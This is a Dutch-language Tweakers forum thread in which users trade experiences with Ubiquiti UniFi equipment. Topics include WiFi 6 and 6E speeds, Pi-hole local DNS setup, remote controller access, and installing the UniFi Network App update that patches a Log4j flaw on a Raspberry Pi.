Niet alleen op 2,4 maar ook op 5GHz. Mijn ervaring is dat AX-clients op een 5 GHz AC-netwerk sneller zijn dan AC-clients.To_Tall schreef op maandag 13 december 2021 @ 22:47:
[...]
....
Weegt het prijskaartje tov WIFI5?? Uhh ja denk het wel langzaam zie je steeds meer AX compatibel devices komen. Merk je er in praktijk iets van?? Ja op de 2,4GHZ band wel.
Toen ik een Intel AX210 in mijn laptop kreeg, had ik in eerste instantie nog een AC wifi-router, de Netgear R7800. De AX210 was zo'n 10 - 20% sneller (netto) dan de Intel AC9560 die ik eerst in de laptop had.
- nero355
- Registratie: Februari 2002
- Laatst online: 28-02 22:21
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Zoals altijd... de welbekende vraag... :BushWhacker schreef op maandag 13 december 2021 @ 19:05:
sinds kort weigeren mijn devices (OnePlus 6 en 8T met Android 11) te roamen naar een andere AP.
Pas als echt de verbinding wegvalt pakken ze de andere op.
Ik heb echt geen idee wat ik er aan kan doen om ze, automatisch, het andere AP op te laten pakken.
Ik heb met de 802.11r/v etc geprobeerd, maar dat helpt ook niet.
Heb je wel de accesspoints zo afgestemd dat ze elkaar niet overlappen ?!
Of in ieder geval zo weinig mogelijk...
Apps = Ellende = NIET DOEN!!!Al die apps via de playstore helpen niet.
Heb je wel al die spyware van Ubiquiti uitgeschakeld in de UniFi Controller en via de losse files op het apparaat dat de Controller draaitHKLM_ schreef op maandag 13 december 2021 @ 20:55:
Via ios 15.2 haal ik naar boven dat mijn unifi app onderstaande domeinen aanspreekt. Iemand een idee welke de eerste en de vijfde doen?
[Afbeelding]
Windows laat altijd de maximale theoretische snelheid zien als je WLAN NIC niks doet, maar op het moment dat je daadwerkelijk flink gaat zitten uploaden/downloaden dan kakt die snelheid al gauw in!psy schreef op maandag 13 december 2021 @ 21:25:
Tijdje geleden heb ik mijn U6 Pro in gebruik genomen.
Toen zitten meten op 802.11ax snelheid met een iPhone. Max toen iets van 600 Mb/s.
Maar wat zie ik nu tot mijn grote verbazing...
Ik zit nog een uurtje te werken op de Lenovo T590 en zie opeens dat mijn wifi adapter 866 Mb/s aangeeft.
Adapter is een Intel a9560, deze heeft 2x2. Op 802.11ac wel te verstaan.
Als ik het goed heb is dat het theoretische maximum voor 2x2? Maar ik haal het nu gewoon. Notabene op ac, niet eens ax (dat heeft deze laptop niet).
Maar is dat normaal? Ik dacht dat je dat soort snelheden niet kon halen.
Doe gewoon wat iPerf3 testjes of simpelweg SMB file transfers en je merkt gauw genoeg wat je een beetje kan halen over je WiFi netwerk heen...
Meer Switch i.p.v. Hub werking inderdaad!To_Tall schreef op maandag 13 december 2021 @ 22:47:
WiFi 6 is meer ontwikkeld voor de dichtheid. Steeds meer gebruikers.
Ik hoop dan ook dat alle fabrikanten daar zich netjes aan houden deze keer, want bij 802.11ac was dat absoluut niet het geval!AX werkt standaard dmv MU-MIMO. Terwijl AC ook met MU-MIMO overweg kan. Tot Max 4x4.

Heel die 2.4 GHz band moeten we gewoon vergeten!Weegt het prijskaartje tov WIFI5?? Uhh ja denk het wel langzaam zie je steeds meer AX compatibel devices komen. Merk je er in praktijk iets van?? Ja op de 2,4GHZ band wel.
Lekker overal accesspoints plaatsen die op 5 GHz en straks geheel GRATISCH ook 6 GHz kunnen kletsen!
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Ja, is natuurlijk ergens ook wel logisch, want de PiHole is immers je DNS server.nero355 schreef op maandag 13 december 2021 @ 17:43:
[...]
[...]
Mijn TIP zal voor altijd blijven :
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
Dan ga ik de lijst die ik nu aan het maken ben voor de USG gewoon in de /etc/dnsmasq.d van de PiHole zetten, dat zou compatibel moeten zijn.
Is het dan nog verstandig om de (local) DNS op de Unifi Controller uit te zetten (als dat überhaupt kan)?
Thanks!mrdemc schreef op maandag 13 december 2021 @ 17:53:
[...]
Wat dat betekent, is dat het IP 192.168.2.107 opgezocht wordt door een systeem om de hostnaam te achterhalen. in feite is dat een opdracht alscode:en dat wordt door pi-hole vervolgens vertaald naar een domein (kun je daarmee ook reproduceren). Dat betekent verder niets en betekent juist (mits de router dan het verzoek beantwoord) dat het goed gaat. Waarschijnlijk is het de pi-hole in dit geval die probeert te achterhalen wat de hostnaam is van het systeem dat een DNS verzoek doet (bron zou je moeten kunnen zien).
1 nslookup 192.168.2.107
Dit gaat trouwens over het tweede vinkje. Als je puur van hostnaam naar IP wilt kunnen resolven is het aanzetten van het tweede vinkje in principe geen probleem zover ik weet.
Ehhm.... De U6 Pro heeft toch alleen 2.4 en 5Ghz radio's?nero355 schreef op maandag 13 december 2021 @ 23:07:
[...]
Lekker overal accesspoints plaatsen die op 5 GHz en straks geheel GRATISCH ook 6 GHz kunnen kletsen!
Hoe moet zo'n apparaat 6GHz gaan bedienen zonder radio voor deze frequentie?
Wifi 6 ax gaat over 5GHz band.
Wifi 6E ax gaat over 6 GHz, maar daarvoor heb je wel een (aparte) radio nodig in je AP om deze frequentie band te kunnen gebruiken.
Edit: ik wil best al mijn bestaande AP's upgraden naar ax-protocol, maar alleen als ik zeker weet dat deze nieuwe AP's ook de 6Ghz ondersteunen.
Ik ga niet 2x upgraden. (eerst naar ax op 5GHz en later nog een keer naar ax op 6GHz)
[ Voor 36% gewijzigd door GarBaGe op 14-12-2021 10:18 ]
Ryzen9 5900X; 16GB DDR4-3200 ; RTX-4080S ; 7TB SSD
@GarBaGe @nero355 Mijn glazen bol zegt dat in Q1-2022 de U6-Enterprise beschikbaar komt in de Early Access en dat dit het eerste Ubiquiti accesspoint zal zijn met een 6 GHz radio (WiFi 6E).
[ Voor 8% gewijzigd door robertwebbe op 14-12-2021 10:33 ]
- nero355
- Registratie: Februari 2002
- Laatst online: 28-02 22:21
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Laat de custom.list aanmaken via de webGUI en vul die daarna lekker zelf in!Ben.Hahlen schreef op dinsdag 14 december 2021 @ 09:16:
Ja, is natuurlijk ergens ook wel logisch, want de PiHole is immers je DNS server.
Dan ga ik de lijst die ik nu aan het maken ben voor de USG gewoon in de /etc/dnsmasq.d van de PiHole zetten, dat zou compatibel moeten zijn.
Dat doet je USG dus zolang die niet de DNS Server is heb je daar geen last van!Is het dan nog verstandig om de (local) DNS op de Unifi Controller uit te zetten (als dat überhaupt kan)?
Maar ik lees net dat het al gelukt is :
Ben.Hahlen schreef op dinsdag 14 december 2021 @ 15:51:
@nero355 DNS in de PiHole zetten en DHCP via de USG werkt dikke prima!
....alleen wel zorgen dat de tweede PiHole ook de juiste dnsmasq file heeft
Als je nog wat wilt weten : Zie de link in mijn signature!
Ik heb onlangs begrepen dat de Intel AX200 serie WLAN NIC's de 6 GHz frequentie gewoon erbij hebben gekregen via een firmware/driver update dus misschien is er ook zoiets mogelijk voor sommige UniFi accesspointsGarBaGe schreef op dinsdag 14 december 2021 @ 10:00:
Ehhm.... De U6 Pro heeft toch alleen 2.4 en 5Ghz radio's?
Hoe moet zo'n apparaat 6GHz gaan bedienen zonder radio voor deze frequentie?
Dat is de theorie inderdaadWifi 6 ax gaat over de 2.4 GHz en de 5GHz band.
Wifi 6E ax gaat over 6 GHz, maar daarvoor heb je wel een (aparte) radio nodig in je AP om deze frequentie band te kunnen gebruiken.
Dat ben ik dan ook helemaal met je eens!Edit: ik wil best al mijn bestaande AP's upgraden naar ax-protocol, maar alleen als ik zeker weet dat deze nieuwe AP's ook de 6Ghz ondersteunen.
Ik ga niet 2x upgraden. (eerst naar ax op 5GHz en later nog een keer naar ax op 6GHz)
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Ik ben eigenlijk nog wel benieuwd naar het volgende. Ik heb 16 sites aan mijn controller hangen. Hiervan hebben er 10 4g backup met een wisselend ip adres. Juist als de 4g backup is ingeschakeld wil ik de controller kunnen gebruiken om te zien of alles goed gaat. Hoe zou je dit inrichten qua beveiliging?HKLM_ schreef op maandag 13 december 2021 @ 19:41:
[...]
Jij hebt unifi controllers direct aan het internet hangen en opvraagbaar voor iedereen?
Unifi Cloud access gebruiken of een DDNS dienst welke automatisch het IP adres aanpast bij de DNS naamTonne schreef op woensdag 15 december 2021 @ 07:20:
[...]
Ik ben eigenlijk nog wel benieuwd naar het volgende. Ik heb 16 sites aan mijn controller hangen. Hiervan hebben er 10 4g backup met een wisselend ip adres. Juist als de 4g backup is ingeschakeld wil ik de controller kunnen gebruiken om te zien of alles goed gaat. Hoe zou je dit inrichten qua beveiliging?
Cloud ☁️
Heb ik overwogen, maar vond het met de dnsmasq.d methode leuker (en dan zou ik het in theorie nog kunnen porteren, mocht dat ooit nodig zijn)nero355 schreef op dinsdag 14 december 2021 @ 16:33:
[...]
Laat de custom.list aanmaken via de webGUI en vul die daarna lekker zelf in!
Ja, volgens mij snap ik datnero355 schreef op dinsdag 14 december 2021 @ 16:33:
[...]
Dat doet je USG dus zolang die niet de DNS Server is heb je daar geen last van!
Maar ik lees net dat het al gelukt is :
[...]
Oh! Interessant! FF doorlezen!nero355 schreef op dinsdag 14 december 2021 @ 16:33:
Als je nog wat wilt weten : Zie de link in mijn signature!
Network App 6.5.55 is uit, om het tweede Log4j gat te patchen.
* This release is currently a release candidate.Polyphemus schreef op woensdag 15 december 2021 @ 12:19:
Network App 6.5.55 is uit, om het tweede Log4j gat te patchen.
Dus niet beschikbaar voor iedereen (tenzij je handmatig gaat installeren)
Assumption is the mother of all fuck-ups / You're MAdD. Well thank God for that, 'cause if I wasn't this would probably never work
Sja, dan is het kiezen of delen; of je laat de deur open staan, of je meldt je aan voor early access en zet hem erop met twee klikken.MAdD schreef op woensdag 15 december 2021 @ 12:23:
[...]
* This release is currently a release candidate.
Dus niet beschikbaar voor iedereen (tenzij je handmatig gaat installeren)
[ Voor 2% gewijzigd door Polyphemus op 15-12-2021 12:54 . Reden: Smiley vergeten ]
ik zie toch echt wat anders.MAdD schreef op woensdag 15 december 2021 @ 12:23:
[...]
* This release is currently a release candidate.
Dus niet beschikbaar voor iedereen (tenzij je handmatig gaat installeren)
:fill(white):strip_exif()/f/image/tK0t6VKbw24YRGWWjpSwoXiy.png?f=user_large)
Net gewoon kunnen installeren op mijn raspberry pi.
Als je een raspberry Pi gebruikt voor Unifi heb je hierbij uit ander topic hoe je dit kan installeren.
Topic: https://gathering.tweakers.net/forum/list_messages/1873125/0
Stap 1: inloggen op je pi.
Stap 2: wget https://dl.ui.com/unifi/6...0d/unifi_sysvinit_all.deb
Stap 3: sudo dpkg -i unifi_sysvinit_all.deb; sudo apt install -f -y
Stap 4: bij inloggen zie je dan jouw versie
:fill(white):strip_exif()/f/image/H51WBZlwb43t5SDpxQUsNYKB.png?f=user_large)
ik kreeg vanmiddag om 13.05 ook een melding dat er een update klaar stond,
maar wacht even totdat werktijd voorbij is anders hebben we een andere uitdaging hier.
nb hier een UDM pro
maar wacht even totdat werktijd voorbij is anders hebben we een andere uitdaging hier.
nb hier een UDM pro
Aramiss schreef op woensdag 15 december 2021 @ 14:24:
[...]
Net gewoon kunnen installeren op mijn raspberry pi.
Als je een raspberry Pi gebruikt voor Unifi heb je hierbij uit ander topic hoe je dit kan installeren.
Topic: https://gathering.tweakers.net/forum/list_messages/1873125/0
Stap 1: inloggen op je pi.
Stap 2: wget https://dl.ui.com/unifi/6...0d/unifi_sysvinit_all.deb
Stap 3: sudo dpkg -i unifi_sysvinit_all.deb; sudo apt install -f -y
Stap 4: bij inloggen zie je dan jouw versie
[Afbeelding]
Ik heb een NUC 7i3BNK overgenomen van iemand met 128 GB SSD en 4 GB geheugen.
Ik heb deze aangeschaft om Home Assistant te gaan draaien. Ik wil dit doen in Proxmox en zat er over te denken om dan wellicht de UniFi controller ook op deze machine te gaan draaien. Dat scheelt weer een kastje in de meterkast en scheelt wellicht ook nog wat energie.
Ik heb de controller nu draaien op een Pi 3B.
Is het slim dit samen te voegen op de NUC? En zou ik er dan wellicht slim aan doen om een wat grotere SSD aan te schaffen?
Ik heb deze aangeschaft om Home Assistant te gaan draaien. Ik wil dit doen in Proxmox en zat er over te denken om dan wellicht de UniFi controller ook op deze machine te gaan draaien. Dat scheelt weer een kastje in de meterkast en scheelt wellicht ook nog wat energie.
Ik heb de controller nu draaien op een Pi 3B.
Is het slim dit samen te voegen op de NUC? En zou ik er dan wellicht slim aan doen om een wat grotere SSD aan te schaffen?
Je kan er natuurlijk altijd een grotere ssd in drukken.Phoolie schreef op woensdag 15 december 2021 @ 15:45:
Ik heb een NUC 7i3BNK overgenomen van iemand met 128 GB SSD en 4 GB geheugen.
Ik heb deze aangeschaft om Home Assistant te gaan draaien. Ik wil dit doen in Proxmox en zat er over te denken om dan wellicht de UniFi controller ook op deze machine te gaan draaien. Dat scheelt weer een kastje in de meterkast en scheelt wellicht ook nog wat energie.
Ik heb de controller nu draaien op een Pi 3B.
Is het slim dit samen te voegen op de NUC? En zou ik er dan wellicht slim aan doen om een wat grotere SSD aan te schaffen?
Is er btw een storing bij Ubnt? Externe toegang lijkt niet meer te werken.
[ Voor 4% gewijzigd door Harmen op 15-12-2021 16:41 ]
Whatever.
Let op:
Dit topic is alleen bedoeld voor het bespreken van ervaringen van Ubiquiti Netwerkapparatuur! Protect and Access horen daar niet bij.
Andere onderwerpen horen thuis in:
- Aankoopadvies: [Ubiquiti-apparatuur] Aankoopadvies & Discussie
- IPTV: [Ubiquiti & IPTV] Ervaringen & Discussie
- Deurbel: [Ubiquiti UniFi Protect G4 Doorbell] Ervaringen & Discussie
- Unifi Access: [Ubiquiti UniFi Acces] Ervaringen & Discussie
- Unifi Protect: [UniFi Protect] Ervaringen en Discussies
Gebruik als laatste eerst de search voordat je een vraag stelt. Veel vragen komen telkens terug en de antwoorden zijn dus terug te vinden.
Dit topic is alleen bedoeld voor het bespreken van ervaringen van Ubiquiti Netwerkapparatuur! Protect and Access horen daar niet bij.
Andere onderwerpen horen thuis in:
- Aankoopadvies: [Ubiquiti-apparatuur] Aankoopadvies & Discussie
- IPTV: [Ubiquiti & IPTV] Ervaringen & Discussie
- Deurbel: [Ubiquiti UniFi Protect G4 Doorbell] Ervaringen & Discussie
- Unifi Access: [Ubiquiti UniFi Acces] Ervaringen & Discussie
- Unifi Protect: [UniFi Protect] Ervaringen en Discussies
Gebruik als laatste eerst de search voordat je een vraag stelt. Veel vragen komen telkens terug en de antwoorden zijn dus terug te vinden.